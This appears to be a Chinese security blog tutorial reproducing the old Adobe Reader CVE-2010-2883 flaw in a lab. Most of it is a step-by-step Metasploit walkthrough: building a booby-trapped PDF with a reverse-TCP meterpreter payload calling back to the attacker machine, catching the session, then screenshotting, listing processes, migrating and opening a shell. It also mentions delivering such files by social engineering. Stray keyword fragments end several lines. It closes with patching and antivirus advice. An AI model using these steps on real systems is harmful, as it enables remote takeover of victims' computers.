在「漏洞界」,據稱有兩種大山是其餘軟件永遠沒法匹敵的,一個是Microsoft的Office套件,一個是Adobe的全家桶。這兩家出的漏洞,不管在出洞頻率、***危害性、或者是影響範圍等多個維度來看,都直接將其餘軟件遠遠甩開。若是要較真起來,到底誰是「漏洞之王」?shell
相信Adobe必定能「摘得桂冠」。windows
Adobe全家桶裏面的Adobe Flash Player、Adobe Reader、Adobe Acrobat等產品,能夠說是「難兄難弟」了,每一年都會貢獻一大堆漏洞。不少人就會問,爲何就他們家的產品漏洞最多,別人家的呢?安全
其實,全部軟件都或多或少有漏洞,沒有絕對安全的軟件,就看有沒有人去挖掘而已。微信
Adobe系列由於桌面安裝量很是龐大,並且官方彷佛安全開發工做這塊作的不是太好,大量的***或安全研究人員願意投入更多的時間來「挖洞」,一個成熟可利用的Adobe 0day漏洞,價值連城絕不誇張。tcp
這不,2018年2月份,Adobe Flash最新版就爆出CVE-2018-4878 高危漏洞,可致使電腦直接被getshell。而同一月份,思科旗下安全團隊TALOS披露了Adobe Reader最新版存在遠程代碼執行漏洞(CVE-2018-4901),簡單來講,「打開PDF文件可能致使被getshell」。目前,Adobe已經發布了針對此漏洞的安全補丁。ide
因爲Adobe Reader CVE-2018-4901 暫時尚未成熟可用的***代碼流傳出來,因此目前並無像Adobe Flash CVE-2018-4878 引發更普遍的關注。工具
可是,咱們要注意一點的是,此時此刻,一定有不少***正在嘗試寫***代碼,準備發起新一輪***。學習
雖然咱們無法直接對最新CVE-2018-4901進行復現,但從學習的角度,能夠拿一個很是經典的老漏洞 CVE-2010-2883 來進行實踐。這枚漏洞年限已久,但能夠直接作出「打開pdf即刻中招」的效果,能夠說是「簡單暴力」的典範了。字體
CVE-2010-2883漏洞原理:「Adobe Reader在處理CoolType字體文件的sing表時,存在棧溢出漏洞,當打開特製的惡意PDF文件時,可容許任意代碼遠程執行。」ui
影響版本:Adobe Reader 8.2.4 - 9.3.4
目前,Kali Linux Metasploit已經集成了相關的漏洞利用代碼,咱們能夠用較快的速度,對此漏洞進行復現。
Kali Linux + Windows 7 sp1
***機:Kali Linux (ip:172.16.70.216)
靶機:Windows 7 sp1 (ip:172.16.70.199)
軟件:Adobe Reader 9.3.exe
注:此實驗環境所用***機和靶機,跟以前文章所分享一致。爲了節省你們實驗時間,我將此實驗涉及到的工具所有上傳到網盤=>
連接: https://pan.baidu.com/s/1585jIDZgRh7IzwE01dK-Bw 密碼:ie8m
搜索Adobe***模塊 msf > search adobe_cooltype_sing
調用***模塊 msf > use exploit/windows/fileformat/adobe_cooltype_sing/
查看模塊詳情 msf exploit(adobe_cooltype_sing) > info
調用meterpreter載荷,反向鏈接到***機 msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
設置Kali Linux的IP地址 msf exploit(adobe_cooltype_sing) > set LHOST 172.16.70.216
設置本地監聽端口 msf exploit(adobe_cooltype_sing) > set LPORT 8888
設置帶有後門程序的PDF文件 msf exploit(adobe_cooltype_sing) > set FILENAME PINGINGLAB.pdf
執行***生成文件 msf exploit(adobe_cooltype_sing) > exploit
②將PDF***文件拷貝至Kali Linux桌面
root@kali:~# cp /root/.msf4/local/PINGINGLAB.pdf /root/Desktop/PINGINGLAB.pdf
使用handler監聽模塊 msf > use exploit/multi/handler
回彈一個tcp鏈接 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
設置監聽IP地址(跟PDF***文件一致) msf exploit(handler) > set LHOST 172.16.70.216
設置監聽的端口(跟PDF***文件一致) msf exploit(handler) > set LPORT 8888
開啓監聽 msf exploit(handler) > exploit
查看系統信息 meterpreter > sysinfo
查看當前用戶 meterpreter > getuid
截屏 meterpreter > screenshot
獲取進程 meterpreter > ps
切換進程(考慮到這個漏洞利用過程,adobe reader會「卡殼」退出,因此須要快速切換到其餘系統進程,這樣會話纔不會失效)
meterpreter > migrate 3748
獲取Dos Shell meterpreter > shell
C:\Windows\system32>ipconfig
實驗總結:
能夠看到,最終因爲Adobe Reader 存在CVE-2010-2883這個高危漏洞,致使電腦打開特殊定製的pdf以後,直接變成肉雞。與以前文章中的Office和Flash 0day漏洞相似,真實環境下,不少***會利用此方法,結合社會工程學,例如經過誘導郵件、各類論壇、QQ羣、微信羣等多渠道,誘導用戶下載並打開,而只要打開的用戶,就直接中招。
在這裏也呼籲你們:日常要很是當心陌生辦公文件,不管是pdf仍是word等,打開以前必定要明確來源,或者用殺毒軟件先殺毒,再打開。另外,就是儘可能保證電腦的軟件處於最新版,這樣才能最大程度下降被***的概率。
①直接到Adobe官網,下載Adobe Reader最新版本;
②安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。
相關推文:
[漏洞復現] MS17-010 基於"永恆之藍"實現Windows Getshell